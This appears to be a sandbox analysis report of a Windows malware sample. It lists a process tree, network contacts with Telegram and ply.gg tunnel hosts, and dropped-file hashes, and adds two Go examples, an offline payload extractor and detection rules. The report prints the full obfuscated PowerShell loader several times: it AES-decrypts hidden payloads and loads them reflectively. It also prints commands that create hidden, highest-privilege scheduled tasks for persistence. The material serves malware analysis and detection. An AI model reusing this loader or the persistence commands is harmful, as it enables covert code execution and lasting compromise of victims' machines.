Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3928 wrote to memory of 4112 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3928 wrote to memory of 4112 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4112 wrote to memory of 356 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4112 wrote to memory of 356 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4112 wrote to memory of 1700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4112 wrote to memory of 1700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1700 wrote to memory of 380 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1700 wrote to memory of 380 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 380 wrote to memory of 4396 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 380 wrote to memory of 4396 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4396 wrote to memory of 3604 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4396 wrote to memory of 3604 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3604 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3604 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3008 wrote to memory of 2292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3008 wrote to memory of 2292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4396 wrote to memory of 4472 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wermgr.exe
PID 4396 wrote to memory of 4472 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wermgr.exe
PID 3008 wrote to memory of 4444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 3008 wrote to memory of 4444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4444 wrote to memory of 1628 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4444 wrote to memory of 1628 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1628 wrote to memory of 4420 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1628 wrote to memory of 4420 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Double.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Double.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_306_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_306.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_306.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_306.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_306.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_306.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
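The powershell.exe command lines in this process list are one loader carrying two different key/IV pairs: Double.bat and its startup_str_306.bat copy embed the first pair, XClientNOT.bat and its startup_str_991.bat copy the second. The loader reads its own .bat back from disk, takes the first line that begins with ':: ' (a batch comment, so cmd.exe skips it), splits it on '\', then base64-decodes, AES-CBC-decrypts (PKCS7 padding) and gunzips each piece before handing the bytes to Assembly.Load and invoking EntryPoint. Method names are spelled backwards and reassembled at runtime ('gnirtS46esaBmorF'[-1..-16] -join '' is FromBase64String, 'daoL' is Load, 'txeTllAdaeR' is ReadAllText) to defeat plain string matching. The Go program below is an added example, not part of this report or of the sample: it repeats the same pipeline offline so the two stages can be carved out for analysis without executing anything. The keys and IVs are the ones quoted in the command lines; the ciphertext on the ':: ' line is not reproduced in this report, so the program builds a constructed stand-in (BuildFixture) to exercise itself. LoaderKeys, ExtractPayloads, decryptAndInflate and BuildFixture are names chosen here.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"fmt"
	"io"
	"strings"
)

// B64 decodes one of the fixed literals below; they are copied verbatim, so a decode error is a bug here.
func B64(s string) []byte {
	b, err := base64.StdEncoding.DecodeString(s)
	if err != nil {
		panic(err)
	}
	return b
}

// Key/IV pairs copied from the loader command lines in this report (Double.bat and its startup_str_306.bat
// copy embed the first, XClientNOT.bat and startup_str_991.bat the second). 32-byte keys mean AES-256.
var LoaderKeys = map[string][2][]byte{
	"Double.bat":     {B64("WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44="), B64("4bA2EKopXpAd9WyBAjAcwg==")},
	"XClientNOT.bat": {B64("IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U="), B64("PASGTQqG4m/1CfnhhohGIA==")},
}

// ExtractPayloads does offline what the loader does in memory: take the first line starting with ":: ",
// split it on '\' and push each piece through base64 -> AES-CBC/PKCS7 -> gzip. Nothing is executed.
func ExtractPayloads(bat string, key, iv []byte) ([][]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	for _, line := range strings.Split(bat, "\n") {
		if line = strings.TrimRight(line, "\r"); !strings.HasPrefix(line, ":: ") {
			continue
		}
		var out [][]byte
		for i, part := range strings.Split(line[3:], `\`) {
			pe, err := decryptAndInflate(block, iv, part)
			if err != nil {
				return nil, fmt.Errorf("payload %d: %w", i, err)
			}
			out = append(out, pe)
		}
		return out, nil
	}
	return nil, fmt.Errorf("no ':: ' payload line found")
}

// decryptAndInflate is decrypt_function followed by decompress_function. A wrong key shows up as bad
// PKCS#7 padding or a missing gzip header, so both checks stay strict instead of returning garbage.
func decryptAndInflate(block cipher.Block, iv []byte, b64Payload string) ([]byte, error) {
	ct, err := base64.StdEncoding.DecodeString(b64Payload)
	if err != nil || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("payload is not base64 of whole AES blocks (%v)", err)
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	pad := int(pt[len(pt)-1])
	if pad == 0 || pad > aes.BlockSize || !bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return nil, fmt.Errorf("bad PKCS#7 padding (wrong key or corrupt data)")
	}
	zr, err := gzip.NewReader(bytes.NewReader(pt[:len(pt)-pad]))
	if err != nil {
		return nil, err
	}
	return io.ReadAll(zr) // also verifies the gzip CRC at end of stream
}

// BuildFixture runs the pipeline in reverse (gzip -> pad -> AES-CBC -> base64) and wraps the result in
// the loader's ":: " line, so the extractor can be exercised without the real ciphertext (not in this report).
func BuildFixture(payloads [][]byte, key, iv []byte) string {
	block, _ := aes.NewCipher(key)
	var parts []string
	for _, p := range payloads {
		var gz bytes.Buffer
		zw := gzip.NewWriter(&gz)
		zw.Write(p)
		zw.Close()
		pad := aes.BlockSize - gz.Len()%aes.BlockSize
		pt := append(gz.Bytes(), bytes.Repeat([]byte{byte(pad)}, pad)...)
		ct := make([]byte, len(pt))
		cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, pt)
		parts = append(parts, base64.StdEncoding.EncodeToString(ct))
	}
	return "@echo off\r\n:: " + strings.Join(parts, `\`) + "\r\n"
}

func main() {
	// Constructed stand-ins for the two stages; with a real sample, pass the .bat contents instead.
	k := LoaderKeys["Double.bat"]
	fixture := BuildFixture([][]byte{[]byte("MZ stage-1 stand-in"), []byte("MZ stage-2 stand-in")}, k[0], k[1])
	payloads, err := ExtractPayloads(fixture, k[0], k[1])
	fmt.Printf("payloads=%q err=%v\n", payloads, err)
}
```

With a real sample, read the .bat and call ExtractPayloads with each pair in LoaderKeys; the pair that belongs to another file fails the padding or gzip check rather than producing bytes. Each decoded stage should begin with MZ, since the loader passes it straight to Assembly.Load; the first stage is invoked with no arguments and the second with an empty string array, which is worth preserving when the carved binaries are run or decompiled separately.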

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_991_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_991.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\system32\wermgr.exe

"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4396" "2636" "2296" "2632" "0" "0" "2640" "0" "0" "0" "0" "0"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_991.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_991.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_991.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_991.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
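Every process in the chain above is a stock Windows binary (cmd.exe, powershell.exe, WScript.exe, wermgr.exe), so the durable signal is in the command lines rather than in file hashes: an execution-policy bypass with the whole script body inline, the reversed-string obfuscation, a byte array fed to System.Reflection.Assembly with EntryPoint invoked, a hidden logon task registered with -RunLevel Highest whose action is a .vbs under AppData\Roaming, and WScript.exe running that .vbs. The Go program below is an added example, not part of this report: a small rule set over process command lines of the kind a Sysmon event 1 or a 4688 with command-line auditing supplies, run against four lines copied from this process list (the loader line abridged to the fragments the rules key on) and two constructed benign lines. Each rule is a set of patterns that must all match, so the order of switches on the line does not matter. Rule names, the abridged loader line and the benign samples are this example's own.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Rule fires only when every pattern matches, so the order of switches on the command line is irrelevant.
type Rule struct {
	Name string
	All  []*regexp.Regexp
}

func re(pattern string) *regexp.Regexp { return regexp.MustCompile(`(?i)` + pattern) }

// Rules derived from the process tree above. Each targets a behaviour of the chain, not a file hash.
var Rules = []Rule{
	// cmd.exe running a .bat out of %TEMP% or %APPDATA%: the first hop and both persistence copies.
	{"cmd_bat_from_temp_or_roaming", []*regexp.Regexp{
		re(`\bcmd\.exe"?\s+/c\b`), re(`\\AppData\\(Local\\Temp|Roaming)\\[^"\s]*\.bat\b`)}},
	// PowerShell with the execution policy bypassed and the loader passed inline via -command.
	{"ps_ep_bypass_inline", []*regexp.Regexp{
		re(`powershell(\.exe)?`), re(`-e(p|xecutionpolicy)\s+bypass\b`), re(`-c(ommand)?\s`)}},
	// 'gnirtS46esaBmorF'[-1..-16] -join '' : a method name spelled backwards to dodge string matching.
	{"ps_reversed_string_obfuscation", []*regexp.Regexp{re(`'[^']{2,}'\[-1\.\.-\d+\]\s*-join\s*''`)}},
	// A byte array handed to System.Reflection.Assembly and its EntryPoint invoked: in-memory .NET load.
	{"ps_reflective_assembly_load", []*regexp.Regexp{
		re(`\[System\.Reflection\.Assembly\]::`), re(`\[byte\[\]\]`), re(`\.EntryPoint\b`)}},
	// Hidden, highest-privilege task whose action is a script under the user's profile.
	{"schtask_hidden_highest_profile_script", []*regexp.Regexp{
		re(`Register-ScheduledTask\b`), re(`-Execute\s+'[^']*\\AppData\\[^']*\.(vbs|bat|js|ps1)'`),
		re(`-Hidden\b`), re(`-RunLevel\s+Highest\b`)}},
	// wscript.exe launching a .vbs from AppData\Roaming (what the task does when it fires).
	{"wscript_roaming_vbs", []*regexp.Regexp{re(`\bwscript\.exe\b`), re(`\\AppData\\Roaming\\[^"\s]*\.vbs\b`)}},
}

// Match returns the names of all rules that fire on one process command line, in Rules order.
func Match(cmdline string) []string {
	var hits []string
	for _, r := range Rules {
		fired := true
		for _, p := range r.All {
			if !p.MatchString(cmdline) {
				fired = false
				break
			}
		}
		if fired {
			hits = append(hits, r.Name)
		}
	}
	return hits
}

// Samples: four command lines from this report (the loader line cut down to the fragments the rules key
// on), then two constructed benign lines that must not fire.
var Samples = []string{
	`C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"`,
	`"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); }function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}`,
	`"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_306_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_306.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force`,
	`"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_306.vbs"`,
	`"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command Get-Process`,
	`C:\Windows\system32\cmd.exe /c "C:\Program Files\BuildTools\build.bat"`,
}

func main() {
	for i, s := range Samples {
		fmt.Printf("sample %d: [%s]\n", i, strings.Join(Match(s), " "))
	}
}
```

The two benign lines show the reason for requiring every pattern of a rule: a plain -Command invocation or a .bat outside the profile directories matches one fragment each and stays silent. The scheduled-task rule is the one to keep broad, since the task name here (RuntimeBroker_startup_306_str) is generated per build and the .vbs name changes with it.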

Network

Country Destination Domain Proto
US 8.8.8.8:53 express-divorce.gl.at.ply.gg udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 traffic-collins.gl.at.ply.gg udp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp

Files

memory/4112-4-0x000001C425A40000-0x000001C425A62000-memory.dmp

memory/4112-5-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/4112-6-0x000001C425930000-0x000001C425940000-memory.dmp

memory/4112-7-0x000001C425930000-0x000001C425940000-memory.dmp

memory/4112-10-0x000001C425BF0000-0x000001C425C66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qikc30dv.m3g.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4112-21-0x000001C425930000-0x000001C425940000-memory.dmp

memory/4112-26-0x000001C425BD0000-0x000001C425BD8000-memory.dmp

memory/4112-27-0x000001C425C70000-0x000001C425DB0000-memory.dmp

memory/356-37-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/356-38-0x00000172CCC70000-0x00000172CCC80000-memory.dmp

memory/356-39-0x00000172CCC70000-0x00000172CCC80000-memory.dmp

memory/356-54-0x00000172CCC70000-0x00000172CCC80000-memory.dmp

memory/356-72-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bb4d79c418d1df838dc1dfb6db57501d
SHA1 903525e7a2dac8f931e1ba2f87e1bb1dea08a867
SHA256 f1bf5360d8ede0205136292027ecff131b04d6cfd7bbb9ab146472de948c771f
SHA512 43b3c6ae5facdd7c1d59ff23b5681919252900a7c9cf16270ae51e98372648d1b67323dd1f86745266acc751c0bd8f17e7400c903a02c8f7ca5c74e450c25eee

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Roaming\startup_str_306.vbs

MD5 dc4450363ab10c9f55eaf2d492874449
SHA1 e24646e2935bac1e28d52a61d6d66137c9456bdc
SHA256 66289b23354835c32537852ad0db8b3a1577e6ceb302260b9559fa18954d894e
SHA512 679080f157f9a10aa36aa0db4b005aaed74bdb6d2fdcbcfd37f236c42be5a4b2add257757bc6012ce0f77d16e7503bfb0bc57adf6714cc84d227cc5444179619

C:\Users\Admin\AppData\Roaming\startup_str_306.bat

MD5 948386c98184781df692e5f11ff558f7
SHA1 e8619faf83446ea78e456920834579bbf71aea20
SHA256 7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f
SHA512 0023368d89bf5951b3fc87e4ea8fb84e02a87c0917bd5aef0d5bcc00d5a9de616f4922956a015aa7f748299813876a290b545a309116878506c89de3387148ba

memory/4396-86-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/4396-90-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp

memory/4396-91-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp

memory/4396-105-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp

memory/4112-111-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/4396-117-0x0000017EC89D0000-0x0000017EC8CF4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat

MD5 795363cfbf5d3fca47edc4cbc247a1c0
SHA1 9374d05486b0b62977825d07f748fa03cca3c864
SHA256 84c422d2ccda03230c8eecda7daa2e4ffa00a89d862bed459be52875dde096b6
SHA512 c5f147e4d011342d3518416b0d5d30f5adc8eeadac2b060a94abdd80ef8452a61cca997831d69473a13b52ad7aa8acb2ddf507dd3f49f68dfddaf6cbd7c23c94

memory/4396-123-0x0000017EC8ED0000-0x0000017EC8F20000-memory.dmp

memory/4396-124-0x0000017EC8FE0000-0x0000017EC9092000-memory.dmp

memory/4396-125-0x0000017EC9D60000-0x0000017EC9F22000-memory.dmp

memory/3008-130-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/3008-132-0x000001856BDA0000-0x000001856BDB0000-memory.dmp

memory/3008-133-0x000001856BDA0000-0x000001856BDB0000-memory.dmp

memory/3008-146-0x000001856BDA0000-0x000001856BDB0000-memory.dmp

memory/3008-151-0x000001856BD90000-0x000001856BD98000-memory.dmp

memory/3008-152-0x000001856BED0000-0x000001856BEDC000-memory.dmp

memory/2292-161-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

